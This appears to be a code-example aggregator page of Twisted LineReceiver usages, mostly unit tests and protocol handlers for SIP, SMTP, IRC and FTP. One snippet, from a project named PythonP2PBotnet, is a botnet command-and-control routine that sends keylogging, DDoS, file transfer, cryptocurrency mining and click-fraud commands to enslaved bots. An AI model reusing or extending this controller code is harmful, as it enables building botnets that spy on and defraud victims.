python类LineReceiver()的实例源码

test_basic.py 文件源码 项目:zenchmarks 作者: squeaky-pl 项目源码 文件源码 阅读 30 收藏 0 点赞 0 评论 0
def test_rawDataError(self):
        """
        An error object returned by C{rawDataReceived} is handed back to the
        caller of C{LineReceiver.dataReceived}.
        """
        def failingRawDataReceived(data):
            # Return (rather than raise) the error, so it travels back
            # through dataReceived's return value.
            return RuntimeError("oops")

        receiver = basic.LineReceiver()
        receiver.rawDataReceived = failingRawDataReceived
        receiver.makeConnection(proto_helpers.StringTransport())
        receiver.setRawMode()
        outcome = receiver.dataReceived(b'data')
        self.assertIsInstance(outcome, RuntimeError)
test_basic.py 文件源码 项目:zenchmarks 作者: squeaky-pl 项目源码 文件源码 阅读 32 收藏 0 点赞 0 评论 0
def test_rawDataReceivedNotImplemented(self):
        """
        Calling L{LineReceiver.rawDataReceived} on an instance that has not
        overridden it raises C{NotImplementedError}.
        """
        receiver = basic.LineReceiver()
        with self.assertRaises(NotImplementedError):
            receiver.rawDataReceived('foo')
test_basic.py 文件源码 项目:zenchmarks 作者: squeaky-pl 项目源码 文件源码 阅读 23 收藏 0 点赞 0 评论 0
def test_longUnendedLine(self):
        """
        When more than C{LineReceiver.MAX_LENGTH} bytes arrive without any
        line delimiter, the whole byte string is delivered in one piece to
        L{LineReceiver.lineLengthExceeded}.
        """
        receiver = self.proto
        # Comfortably more than twice the limit, with no delimiter at all.
        oversized = b'x' * (receiver.MAX_LENGTH * 2 + 2)
        receiver.dataReceived(oversized)
        self.assertEqual([oversized], receiver.longLines)
test_basic.py 文件源码 项目:zenchmarks 作者: squeaky-pl 项目源码 文件源码 阅读 24 收藏 0 点赞 0 评论 0
def test_longLineAfterShortLine(self):
        """
        When L{LineReceiver.dataReceived} gets a short, properly delimited
        line followed by an over-long run of bytes with no delimiter,
        L{LineReceiver.lineLengthExceeded} receives every byte that follows
        the short line's delimiter.
        """
        receiver = self.proto
        oversized = b'x' * (receiver.MAX_LENGTH * 2 + 2)
        # One short line, its delimiter, then the undelimited long run.
        payload = b'x' + receiver.delimiter + oversized
        receiver.dataReceived(payload)
        self.assertEqual([oversized], receiver.longLines)
test_basic.py 文件源码 项目:zenchmarks 作者: squeaky-pl 项目源码 文件源码 阅读 27 收藏 0 点赞 0 评论 0
def test_longLineWithDelimiter(self):
        """
        When L{LineReceiver.dataReceived} gets more than
        C{LineReceiver.MAX_LENGTH} bytes whose only line delimiter lies
        beyond the first C{MAX_LENGTH} bytes, the complete byte string is
        handed to L{LineReceiver.lineLengthExceeded}.
        """
        receiver = self.proto
        chunk = b'x' * (receiver.MAX_LENGTH * 2 + 2)
        # Two over-long chunks separated by a single delimiter.
        oversized = chunk + receiver.delimiter + chunk
        receiver.dataReceived(oversized)
        self.assertEqual([oversized], receiver.longLines)
test_basic.py 文件源码 项目:zenchmarks 作者: squeaky-pl 项目源码 文件源码 阅读 24 收藏 0 点赞 0 评论 0
def test_multipleLongLines(self):
        """
        When L{LineReceiver.dataReceived} gets more than
        C{LineReceiver.MAX_LENGTH} bytes containing several line delimiters,
        none of them within the first C{MAX_LENGTH} bytes, the complete byte
        string is handed to L{LineReceiver.lineLengthExceeded}.
        """
        receiver = self.proto
        # One over-long, delimiter-terminated segment; sent twice in a row.
        segment = b'x' * (receiver.MAX_LENGTH * 2 + 2) + receiver.delimiter
        oversized = segment + segment
        receiver.dataReceived(oversized)
        self.assertEqual([oversized], receiver.longLines)
test_basic.py 文件源码 项目:zenchmarks 作者: squeaky-pl 项目源码 文件源码 阅读 22 收藏 0 点赞 0 评论 0
def test_maximumLineLength(self):
        """
        Receiving a line longer than C{MAX_LENGTH} makes C{LineReceiver}
        disconnect its transport.
        """
        transport = proto_helpers.StringTransport()
        receiver = basic.LineReceiver()
        receiver.makeConnection(transport)
        # One byte over the limit, then a delimiter and a trailing byte.
        tooLong = b'x' * (receiver.MAX_LENGTH + 1)
        receiver.dataReceived(tooLong + b'\r\nr')
        self.assertTrue(transport.disconnecting)
sip.py 文件源码 项目:zenchmarks 作者: squeaky-pl 项目源码 文件源码 阅读 26 收藏 0 点赞 0 评论 0
def dataReceived(self, data):
        """
        Pass received data on to C{basic.LineReceiver.dataReceived}.

        C{unicode} input is encoded as UTF-8 first.  If an exception is
        raised while encoding or while the base class processes the data,
        it is logged with C{log.err} and C{self.invalidMessage} is called.

        @param data: The data received from the transport.
        """
        try:
            if isinstance(data, unicode):
                data = data.encode("utf-8")
            basic.LineReceiver.dataReceived(self, data)
        except Exception:
            # Not a bare ``except:``: KeyboardInterrupt and SystemExit are
            # not message errors and must propagate instead of being
            # reported as an invalid message.
            log.err()
            self.invalidMessage()
smtp.py 文件源码 项目:zenchmarks 作者: squeaky-pl 项目源码 文件源码 阅读 29 收藏 0 点赞 0 评论 0
def sendLine(self, line):
        """
        Send C{line} through C{basic.LineReceiver.sendLine}; when
        C{self.debug} is set, first record it in C{self.log} with a
        C{'>>> '} prefix.

        @param line: The line to send.
        """
        # The log entry is only built in debug mode, for performance.
        if self.debug:
            entry = '>>> ' + line
            self.log.append(entry)

        basic.LineReceiver.sendLine(self, line)
irc.py 文件源码 项目:enigma2-plugins 作者: opendreambox 项目源码 文件源码 阅读 27 收藏 0 点赞 0 评论 0
def _reallySendLine(self, line):
        """
        Run C{line} through C{lowQuote}, append a carriage return and send
        the result with C{basic.LineReceiver.sendLine}.

        @param line: The line to send.
        @return: Whatever C{basic.LineReceiver.sendLine} returns.
        """
        quoted = lowQuote(line)
        return basic.LineReceiver.sendLine(self, quoted + '\r')
irc.py 文件源码 项目:enigma2-plugins 作者: opendreambox 项目源码 文件源码 阅读 33 收藏 0 点赞 0 评论 0
def dataReceived(self, data):
        """
        Remove every carriage return from C{data} and pass the result to
        C{basic.LineReceiver.dataReceived}.

        @param data: The data received from the transport.
        """
        withoutCarriageReturns = data.replace('\r', '')
        basic.LineReceiver.dataReceived(self, withoutCarriageReturns)
commander.py 文件源码 项目:PythonP2PBotnet 作者: jhoward321 项目源码 文件源码 阅读 36 收藏 0 点赞 0 评论 0
def parsecommands(self, line):
        tmp = line.split(' ')
        cmd = tmp[0].upper()
        if cmd == 'KEYLOG':
            # Iterate through bot list and send command out in mass.
            # This can be changed depending on the command
            for key, val in self.slaves.iteritems():
                output = 'Starting keylogger for bot {0}\n'.format(key)
                self.transport.write(output)
                # actually send commands out on DHT to bot.
                # Val is the bot's individual location it checks for commands
                botcmd = str(self.count) + " " + cmd
                self.kserver.set(val, botcmd)
        if cmd == 'DDOS':
            for key, val in self.slaves.iteritems():
                output = 'Starting DDOS for bot {0}\n'.format(key)
                self.transport.write(output)
                botcmd = str(self.count) + " " + line
                self.kserver.set(val, botcmd)
        if cmd == 'DOWNLOAD':
            for key, val in self.slaves.iteritems():
                output = 'Starting DOWNLOAD for bot {0}\n'.format(key)
                self.transport.write(output)
                botcmd = str(self.count) + " " + line
                self.kserver.set(val, botcmd)
        if cmd == 'UPLOAD':
            for key, val in self.slaves.iteritems():
                output = 'Starting UPLOAD for bot {0}\n'.format(key)
                self.transport.write(output)
                botcmd = str(self.count) + " " + line
                self.kserver.set(val, botcmd)

        if cmd == 'BITCOIN':
            print("This feature isn't fully implemented, should work "
                  "but highly insecure and slow")
            for key, val in self.slaves.iteritems():
                output = 'Starting BITCOIN MINING for bot {0}\n'.format(key)
                self.transport.write(output)
                botcmd = str(self.count) + " " + line
                self.kserver.set(val, botcmd)
        if cmd == 'CLICKFRAUD':
            for key, val in self.slaves.iteritems():
                output = 'Starting CLICKFRAUD for bot {0}\n'.format(key)
                self.transport.write(output)
                botcmd = str(self.count) + " " + line
                self.kserver.set(val, botcmd)

    # this is called on the initial startup as part of the LineReceiver class
ftp.py 文件源码 项目:zenchmarks 作者: squeaky-pl 项目源码 文件源码 阅读 29 收藏 0 点赞 0 评论 0
def lineReceived(self, line):
        """
        Handle one received line: split it into a command and an optional
        argument, run it through C{self.processCommand} and reply with the
        outcome.

        Producing is paused while the command is processed and resumed once
        its result (or failure) has been handled, unless the connection has
        been lost in the meantime.

        @param line: The received line.
        """
        self.resetTimeout()
        self.pauseProducing()
        if bytes != str:
            line = line.decode(self._encoding)

        def processSucceeded(result):
            # A tuple result is expanded into the arguments of reply();
            # None means there is nothing to send.
            if isinstance(result, tuple):
                self.reply(*result)
            elif result is not None:
                self.reply(result)

        def processFailed(err):
            if err.check(FTPCmdError):
                self.sendLine(err.value.response())
                return
            if err.check(TypeError):
                # A TypeError whose message looks like a wrong-argument-count
                # error is reported to the client as a missing argument.
                text = err.value.args[0]
                if ('takes exactly' in text
                        or 'required positional argument' in text):
                    self.reply(
                        SYNTAX_ERR, "%s requires an argument." % (cmd,))
                    return
            log.msg("Unexpected FTP error")
            log.err(err)
            self.reply(REQ_ACTN_NOT_TAKEN, "internal server error")

        def allDone(ignored):
            if not self.disconnected:
                self.resumeProducing()

        # Everything before the first space is the command; anything after
        # it is passed along as one single argument.
        cmd, separator, remainder = line.partition(' ')
        if separator:
            args = (remainder,)
        else:
            args = ()

        d = defer.maybeDeferred(self.processCommand, cmd, *args)
        d.addCallbacks(processSucceeded, processFailed)
        d.addErrback(log.err)

        # XXX It burnsss
        # LineReceiver doesn't let you resumeProducing inside
        # lineReceived atm
        from twisted.internet import reactor
        reactor.callLater(0, d.addBoth, allDone)


问题


面经


文章

微信
公众号

扫码关注公众号